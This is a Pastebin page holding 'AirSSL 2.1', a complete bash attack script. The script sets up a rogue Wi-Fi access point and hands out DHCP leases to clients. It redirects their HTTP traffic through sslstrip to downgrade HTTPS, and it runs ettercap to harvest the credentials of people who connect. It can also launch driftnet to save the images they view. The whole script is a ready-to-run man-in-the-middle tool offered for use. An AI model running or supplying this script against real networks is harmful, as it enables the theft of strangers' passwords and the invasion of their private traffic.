Guest User

AirSSL 2.1 Updated 04/08/2013

a guest
Aug 4th, 2013
1,738
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2. # (C)opyright 2009 - killadaninja - Modified G60Jon 2010
  3. # airssl.sh - v2.1
  4. # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
  5. # http://www.backtrack-linux.org/forums/showthread.php?t=28111
  6.  
  7.  
  8. # Network questions
  9. echo
  10. echo "AIRSSL 2.1 - Credits killadaninja & G60Jon"
  11. echo
  12. route -n -A inet | grep UG
  13. echo
  14. echo
  15. echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
  16. read -e gatewayip
  17. echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
  18. read -e internet_interface
  19. echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
  20. read -e fakeap_interface
  21. echo -n "Enter the ESSID you would like your rogue AP to be called: "
  22. read -e ESSID
  23.  
  24. # Fake ap setup
  25. echo "[+] Configuring FakeAP...."
  26. echo
  27. echo "Airbase-ng will run in its most basic mode, would you like to
  28. configure any extra switches? "
  29. echo
  30. echo "Press 'Y' to see airbase-ng help and then add custom switches. "
  31. echo "Press 'N' to run airbase-ng in basic mode with your choosen ESSID. "
  32. echo "Press 'A' to run airbase-ng in respond to all probes modie. "
  33.  
  34. read -e ANSWER
  35.  
  36. airmon-ng start $fakeap_interface
  37. fakeap=$fakeap_interface
  38. fakeap_interface="mon0"
  39.  
  40. if [ $ANSWER = "y" ] || [ $ANSWER = "Y" ] ; then
  41. airbase-ng --help
  42.  
  43. echo
  44. echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
  45. redefined, also in this mode you MUST define a channel "
  46. read -e aswitch
  47. echo
  48. echo "[+] Starting FakeAP..."
  49. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
  50. sleep 2
  51.  
  52.  
  53. elif [ $ANSWER = "a" ] || [ $ANSWER = "A" ] ; then
  54. echo
  55. echo "[+] Starting FakeAP..."
  56. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
  57. sleep 2
  58.  
  59.  
  60. elif [ $ANSWER = "n" ] || [ $ANSWER = "N" ] ; then
  61. echo
  62. echo "[+] Starting FakeAP..."
  63. xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
  64. sleep 2
  65.  
  66. else
  67. echo "Next Time Choose one of the options!"
  68. echo "Exiting without making any system changes!"
  69. airmon-ng stop mon0
  70. exit
  71. fi
  72.  
  73.  
  74. # Dhcpd creation
  75. mkdir -p "/usr/share/airssl"
  76. echo "authoritative;
  77.  
  78. default-lease-time 600;
  79. max-lease-time 7200;
  80.  
  81. subnet 10.0.0.0 netmask 255.255.255.0 {
  82. option routers 10.0.0.1;
  83. option subnet-mask 255.255.255.0;
  84.  
  85. option domain-name "\"$ESSID\"";
  86. option domain-name-servers 10.0.0.1;
  87.  
  88. range 10.0.0.20 10.0.0.50;
  89.  
  90. }" > /usr/share/airssl/dhcpd.conf
  91.  
  92.  
  93. # IP Tables
  94. echo "[+] Configuring forwarding tables..."
  95. ifconfig lo up
  96. ifconfig at0 up &
  97. sleep 1
  98. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  99. ifconfig at0 mtu 1400
  100. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  101. iptables --flush
  102. iptables --table nat --flush
  103. iptables --delete-chain
  104. iptables --table nat --delete-chain
  105. echo 1 > /proc/sys/net/ipv4/ip_forward
  106. iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
  107. iptables -P FORWARD ACCEPT
  108. iptables --append FORWARD --in-interface at0 -j ACCEPT
  109. iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
  110. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  111.  
  112. # DHCP
  113. echo "[+] Setting up DHCP..."
  114. touch /var/run/dhcpd.pid
  115. xterm -geometry 75x20+1+100 -T DHCP -e dhcpd -d -f -cf "/usr/share/airssl/dhcpd.conf" at0 & dchpid=$!
  116. sleep 3
  117.  
  118. # Sslstrip
  119. echo "[+] Starting sslstrip..."
  120. xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -k -l 10000 & sslstripid=$!
  121. sleep 2
  122.  
  123. # Ettercap
  124. echo "[+] Configuring ettercap..."
  125. echo
  126. echo "Ettercap will run in its most basic mode, would you like to
  127. configure any extra switches for example to load plugins or filters,
  128. (advanced users only), if you are unsure choose N "
  129. echo "Y or N "
  130. read ETTER
  131. if [ $ETTER = "y" ] || [ $ETTER = "Y" ] ; then
  132. ettercap --help
  133.  
  134. echo " "
  135. echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
  136. For the sake of airssl, ettercap WILL USE -u and -p so you are advised
  137. NOT to use -M, also -i is already set and CANNOT be redifined here.
  138. Ettercaps output will be saved to /pentest/wireless/airssl/passwords
  139. DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
  140. echo
  141. read "eswitch"
  142. echo "[+] Starting ettercap..."
  143. xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
  144. sleep 1
  145.  
  146. else
  147.  
  148. echo
  149. echo "[+] Starting ettercap..."
  150. xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
  151. sleep 1
  152. fi
  153.  
  154. # Driftnet
  155. echo
  156. echo "[+] Driftnet?"
  157. echo
  158. echo "Would you also like to start driftnet to capture the victims images,
  159. (this may make the network a little slower), "
  160. echo "Y or N "
  161. read DRIFT
  162.  
  163. if [ $DRIFT = "y" ] || [ $DRIFT = "Y" ] ; then
  164. mkdir -p "/pentest/wireless/airssl/driftnetdata"
  165. echo "[+] Starting driftnet..."
  166. driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
  167. sleep 3
  168. fi
  169.  
  170. xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
  171.  
  172. clear
  173. echo
  174. echo "[+] Activated..."
  175. echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
  176. echo
  177. echo "[+] IMPORTANT..."
  178. echo "After you have finished please close airssl and clean up properly by pressing any key,
  179. if airssl is not closed properly ERRORS WILL OCCUR "
  180. echo " "
  181. read WISH
  182.  
  183. # Clean up
  184. if [ -n $WISH ] ; then
  185. echo
  186. echo "[+] Cleaning up airssl and resetting iptables..."
  187.  
  188. kill ${fakeapid}
  189. kill ${dchpid}
  190. kill ${sslstripid}
  191. kill ${ettercapid}
  192. kill ${dritnetid}
  193. kill ${sslstriplogid}
  194.  
  195. airmon-ng stop $fakeap_interface
  196. airmon-ng stop $fakeap
  197. echo "0" > /proc/sys/net/ipv4/ip_forward
  198. iptables --flush
  199. iptables --table nat --flush
  200. iptables --delete-chain
  201. iptables --table nat --delete-chain
  202.  
  203. echo "[+] Clean up successful..."
  204. echo "[+] Thank you for using airssl, Good Bye..."
  205. exit
  206.  
  207. fi
  208. exit
RAW Paste Data